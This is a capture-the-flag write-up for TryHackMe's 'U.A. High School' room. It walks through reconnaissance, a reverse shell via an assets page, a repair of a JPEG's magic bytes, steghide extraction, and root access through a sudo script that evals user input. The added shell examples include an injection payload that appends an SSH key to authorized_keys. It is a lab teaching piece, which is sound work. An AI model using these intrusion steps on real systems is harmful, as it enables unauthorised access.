TryHackMe - U.A. High School Writeup
“U.A. High School” is one of the “easy” rooms on TryHackMe (THM).
I start with an Nmap scan and see that ports 22 and 80 are open.
nmap -n -sSCV <ip-address>
I open the web page and a normal page with no obvious clues greets me.
I click through the links on the page, but I can’t find anything interesting there either; then I notice the /assets path.
When I browse to /assets, I get a blank page rather than an error. That is odd, so I try index.html and index.php.
index.php loads without an error, although it shows nothing.
Up to this point I had done a lot of checking and experimenting with ffuf, gobuster, dirb, nikto, Burp and so on; finally one of them worked: dirsearch against that file.
dirsearch -u http://<ip-address>/assets/index.php
The first thing that came to mind was that I could get a reverse shell from here, so I immediately went to revshells.
I prepared the payload and received the connection on the listener I had created with Netcat.
After connecting, I did some research and, using the clue the machine gives, I reached more than one conclusion.
One of them was a base64-encoded password.
I was sure I would use this password somewhere, so I wrote it down and continued.
The other conclusion was that the clue the machine gives is a ‘jpg’ file, which was the real payoff for me.
I then pulled this .jpg file to my machine with wget and, after realising it was corrupted, opened it with ‘hexeditor’.
In the editor I saw that the file’s signature (its leading magic bytes) was PNG’s rather than JPEG’s, so I used the JPEG hex signatures from the list at ‘https://en.wikipedia.org/wiki/List_of_file_signatures’ to overwrite them.
After that the file opened normally: fixed!
That’s when I remembered the password I had written down. I gave it to ‘Steghide’ and extracted the secret clue hidden in the image.
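The header repair above, done as an added script rather than by hand in a hex editor (this is my example, not the room’s file or the author’s commands). It assumes, as the writeup describes, that only the leading bytes of a JFIF JPEG were overwritten with the PNG signature; the function names and the sample file are mine, and the sample is a constructed 16-byte stub, not the real image.

```shell
#!/bin/sh
# Added example: detect a wrong leading signature and restore a standard
# JFIF header in place. Assumption (from the writeup): the original was a
# JFIF JPEG and only its first bytes were replaced by the PNG signature.

# Hex of the first $2 bytes of $1, e.g. "ffd8ffe0" (od/tr are POSIX).
magic() {
    od -An -tx1 -N "$2" "$1" | tr -d ' \n'
}

# Classify by signature, using values from the file-signature list above.
file_kind() {
    case $(magic "$1" 4) in
        ffd8ff*)  echo jpeg ;;
        89504e47) echo png ;;
        *)        echo unknown ;;
    esac
}

# Overwrite the first 12 bytes with SOI + APP0 "JFIF\0" v1.01:
# FF D8 FF E0 00 10 4A 46 49 46 00 01 (octal escapes keep this POSIX sh).
fix_jpeg_header() {
    printf '\377\330\377\340\000\020JFIF\000\001' |
        dd of="$1" bs=1 count=12 conv=notrunc 2>/dev/null
}

# Constructed sample: a JFIF header whose first 8 bytes were replaced by
# the PNG signature (89 50 4E 47 0D 0A 1A 0A), then the tail of a real
# JFIF APP0 segment. This is a stub for the demo, not the room's image.
sample=$(mktemp)
printf '\211PNG\r\n\032\n\111\106\000\001\001\000\000\001\000\001\000\000' > "$sample"

echo "before: $(file_kind "$sample") $(magic "$sample" 12)"
if [ "$(file_kind "$sample")" = png ]; then
    fix_jpeg_header "$sample"
fi
echo "after:  $(file_kind "$sample") $(magic "$sample" 12)"
rm -f "$sample"
```

Run it on the downloaded image instead of the stub (`fix_jpeg_header ./file.jpg`, after `file_kind` reports `png`), then confirm with `file` and extract the hidden data with `steghide extract -sf file.jpg -p <password>`. If the JFIF header is intact past byte 12 the image opens again; if the corruption runs deeper, compare the following bytes against the Wikipedia list rather than blindly rewriting more of the file.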
Now it’s the turn of the user ‘deku’. I had noticed this user when I visited the /home directory.
Privilege escalation is next.
I run sudo -l and move to the .sh file in /opt that it lists.
I read the contents of the .sh script to understand what it does.
I focus on the ‘eval’ section: that is where we can escalate privileges, because eval re-parses whatever string it is given as shell code.
First, I create a key pair with ssh-keygen on my local machine.
Then I set the permissions on the key file.
I copy the contents of the .pub file and, back on the target machine, run the script so that the key is written into the .ssh/authorized_keys file.
Now all that’s left is to connect with SSH using that key.
We take the last flag and terminate the machine.
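To show why the ‘eval’ section is the problem, here is an added example of my own: a feedback-style script that pushes user input through eval, beside the safe form. This is not the room’s /opt script and I am not claiming its exact code; the function names, the temporary directory and the dummy key line are mine. The payload is the same trick the writeup uses: a redirection smuggled into the input so that the script, running via sudo, appends an SSH public key to an authorized_keys file.

```shell
#!/bin/sh
# Added example, not the room's script. Shows how eval turns data into code.

# Vulnerable pattern (assumed; the real script is not reproduced here):
# the string is parsed again by the shell, so ; $(...) and redirections
# inside the input are executed.
unsafe_echo() {
    eval "echo $1"
}

# Safe pattern: the input is only ever data and is printed verbatim.
safe_echo() {
    printf '%s\n' "$1"
}

# Constructed demo: a stand-in for /root/.ssh so the script runs unprivileged.
demo_dir=$(mktemp -d)
# Dummy key line (not a real key) followed by the smuggled redirection.
payload="ssh-ed25519 AAAAexamplekey attacker@kali >> $demo_dir/authorized_keys"

# Through eval the redirection is honoured: the key line lands in the file
# and nothing is printed.
unsafe_echo "$payload"
echo "unsafe wrote: $(cat "$demo_dir/authorized_keys")"

# Through printf the same input is just text: no file is created.
echo "safe printed: $(safe_echo "$payload")"
```

On the box the target is root’s authorized_keys (or whichever user sudo runs the script as), and the sequence is the one in the writeup: `ssh-keygen -t ed25519 -f ./key` locally, paste the .pub line followed by the redirection into the script’s prompt, then `ssh -i ./key root@<ip-address>`. The fix for script authors is the second function: never eval user input; quote it and pass it to printf or echo as a single argument.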
I hope I have not made any spelling mistakes or given any misinformation. Please let me know if you notice any omissions or errors.
For suggestions and questions, you can reach me on LinkedIn.